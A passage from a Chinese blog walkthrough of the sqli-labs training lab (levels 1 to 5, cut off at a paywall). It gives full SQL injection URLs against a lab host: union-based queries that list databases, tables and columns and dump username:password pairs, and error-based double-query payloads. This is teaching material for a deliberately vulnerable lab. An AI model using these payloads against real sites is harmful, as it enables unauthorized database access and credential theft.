sqli-lab Less1-10通关

已于 2025-05-23 23:51:39 修改
阅读量1.3k 收藏 15
点赞数 24
CC 4.0 BY-SA版权
文章标签: oracle 数据库 网络安全 sql
于 2024-09-23 19:11:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65725423/article/details/142454112

Less-1

f843acc3697840ffa669c224e313a6a7.png

页面中“Please input the ID as parameter with numeric value”意思是请以数字值作为参数输入用户标示符。

首先判断这是数字注入还是字符注入。经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询。

5d7e8d10d84543018b12ec49d5f336be.png

然后在id后面加个',就会报错,可能是字符型注入

f12bbdb5b7b941c3a857de766edcd936.png

输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入

17861fd0d1bc469daec90eb92f8d86a6.png

然后用order by 来判断有多少列数据,order by 3,发现是页面正常

d5b07087d6be44a0b11e9398b3d6c36e.png

然后order by 4,发现是报错的

8dec9dade78e4b0392854982efb29b79.png

因此可知共有3列数据

6bc63455633a4cb496d11f1ee07c13a2.png

所以需要用order by确定表的列数才可以使用联合查询

使用union select 1,2,3查看页面是否有显示位

还有在使用联合查询之前需要把id值随便改一个,例如-1,绝不可以是数据库里面所存在的值

3dee94f1316147a18de7326eced59158.png

 发现页面先输出了2和3,说明页面有2个显示位,第一列不显示

查询当前数据库

http://30.10.0.10:34331/Less-1/?id=-1%27%20union%20select%201,2,database()--+

cbbb91f4b04b4316bb40216dea9827da.png

然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息

首先查询数据库名信息

http://30.10.0.10:34331/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3%20--+

b799b735c90d400cad0da9d463390d01.png

查询security内的所有表名

http://30.10.0.10:34331/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+

5cc115bfe3e342f69ec711fcc55da395.png

查询表“Users”中的所有列名

http://30.10.0.10:34331/Less-1/?id=-1%27%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23

485a936e2f8646f68b067644c9303a33.png

批量查询表“Users”的内容,username和password用“:”隔开

http://30.10.0.10:34331/Less-1/?id=-1%27%20union%20select%20null,null,(select%20group_concat(username,0x3a,password)%20from%20users)%23

a9c262b4db6047db8a57d5cf63f361cf.png

Less-2

首先判断漏洞是否存在,加单引号报错,说明漏洞存在

8e488e1c27e346f9be98a8a037f6c282.png

去掉单引号,加and 1=1页面正常,故已闭合

61f606d0e21042e1b17e5a12368679e8.png

用order by 判断该表有多少列,order by 4报错,Order by 3正常,故共有三列

3302bf12aad5444a9c946b26072d6aee.png

判断显示位

6f591733c28e4e6d90f896a1d4681ff6.png

查询当前数据库,为“security”

7839146cfbb2428ca082d17f63c05dac.png

批量查询该数据库中所有表名

1c0ba1a28ff141ff903a28cab9421f35.png

查询表“users”中所有列名

2f31f02b0c0840dc911b4877d9a9323a.png

查询所有username和password,用“:”隔开

c6e28291e4e34e82829cc1f5d4f5ccb2.png

Less-3

首先输入1’,页面报错,故存在漏洞

52bd026c07c840e2b6c9540987ca611d.png

加and 1=1没有用

eff082b8614f4d8f8c242db4c64b73df.png

发现在单引号后加括号可以使其闭合

d1c5f487dc8a4383a4c25912be3d6b77.png

用order by 判断共有几列,发现有3列

8dff53834667467ca6f7e539339065d4.png

将id改为-1,再用union select 查询显示位

9d15393d02904d1bab0f0f95921518dd.png

查询当前数据库名,为“security”

d0646375bd554070be2c1a72798e636d.png

后续过程同Less-2

Less-4

根据报错信息,猜测需要用”)来闭合

983246c1f1e0470f986e4322203b32ad.png

经验证,确实需要用”)来闭合

c0aa744414d34f898a3898c5e731e4d0.png

用order by 判断共有几列,发现有3列

3590fe0ad8cd44b298de8408862026e9.png

之后的过程同Less-2

Less-5:

这道题是“双查询注入”,双查询注入顾名思义形式上是两个嵌套的查询,即select ...(select ...),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个sql函数:

rand()随机函数,返回0~1之间的某个值

floor(a)取整函数,返回小于等于a,且值最接近a的一个整数

count()聚合函数也称作计数函数,返回查询对象的总数

group by cluase分组语句,按照cluase对查询结果分组

concat函数是用来连接,比如 concat(‘a’,’b’)那结果就是ab了

简单的一句话原理就是有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

原理:

通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1(group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中则更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。

首先利用报错查询数据库,为“security”

http://30.10.0.10:41627/Less-5/?id=1%27%20%20union%20select%20null,count(*),concat((select%20database()),floor(rand()*2))%20as%20a%20from%20information_schema.tables%20group%20by%20a--+

70b57a1b398c43cfa45c00d5e3c44c24.png

接着查询数据库中的第一张表名

http://30.10.0.10:41627/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

2b96442e22054ca3b93cc04003572953.png

通过修改LIMIT函数偏移量,查询数据库中的其他表

http://30.10.0.10:41627/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

cf00604dd0b6459991920e8e1c8e6905.png

9420f70a68984b22a8c582e06865cd89.png

412f6eb0edfb4b1d83f3c1830503bd9d.png

接下来利用报错查询列名

http://30.10.0.10:45563/Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23

6bb67c5c2a49463fa1bb1f83b5c2ff41.png

修改LIMIT的偏移量

最低0.47元/天 解锁文章

200万优质内容无限畅学
白夜753
关注
通关SQLilab靶场——Less-1思路步骤
weixin_46694260的博客
08-02 503
通关SQLilab——Less-1必看的思路步骤
Less-1sqlmap手工注入攻击)--sqli
XiaoYeZhu_1314的博客
03-20 707
在这个表里面我们获得了列名: user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password,id,username,password。1' and '1'='1 --+ 正确结果。
sqli-labs less1 通关
weixin_64809022的博客
02-17 162
sqli通关
SQL注入闯关第一关-Less1
qq_54037445的博客
10-06 2243
SQL注入闯关
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1376
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
sqli-lab靶场学习(四)——Less11-14(post方法)
sadoshi的专栏
09-20 543
1-10关都是get方法,本关开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1877
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2327
利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs 1-22 通关手册
XiaoYu_xixi的博客
05-18 1954
sqli-labs是一个印度程序员写的一个关于SQL注入的靶场,一共有65个关卡,其中关卡的类型有但不限于。此处和 Less-18 一样,只是,这里的uagent 换成了 HTTP_REFERER所以同样存在注入,Less-2 是数字型注入(intiger),Less-1 是字符型注入(string)联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过。输入 11' 时没有反应, 1" 则报错,可以判断是双引号注入,且有括号。所以闭合需要考虑单引号和括号。
Sqli-labLess-1教程
m0_72286569的博客
01-28 740
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli-Less1
qq_44060093的博客
04-19 584
最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
sqli-less-1
你好
11-15 537
sqli-less-1
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3679
sqli-labs靶场之前建议补一下基础。
BUUOJ-sqli_labs做题笔记
qq_52988674的博客
08-30 597
less-1 基于错误的单引号字符串 Please input the ID as parameter with numeric value根据该提示在url输入?id=1,可以看到回显正常,试着加一个单引号,页面报错 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LI
sqli-labs Less-1
weixin_33851177的博客
03-19 93
1.首先来到less-1 1.png 2.png 2.请以数字值作为参数输入id。 url后面输入?id=1 3.png 大家可能此时与我不同的是 your sql statement is SELECT * FROM users WHERE id='1' LIMI...
【靶场实操】sql-labs通关详解----第一节:基础注入方式(Less-1Less-10
goldfish8848的博客
08-01 1414
SQL-Labs是一个专注于SQL注入攻击的在线靶场,提供了从基础到高级的多个关卡,供学习者实践和挑战。
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 1032
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库
SQL注入之sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 7164
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
sqli-labs (less1-less4)
Xi4or0uji
07-24 1821
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
sqli-lab通关
最新发布
01-21
### SQLi-Lab 解题思路及通关攻略 #### 实验室介绍 SQLi-Lab 是一个用于学习和实践 SQL 注入漏洞利用的在线平台。通过一系列挑战,参与者可以深入了解不同类型的 SQL 注入攻击及其防御方法。 #### 基础概念理解 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值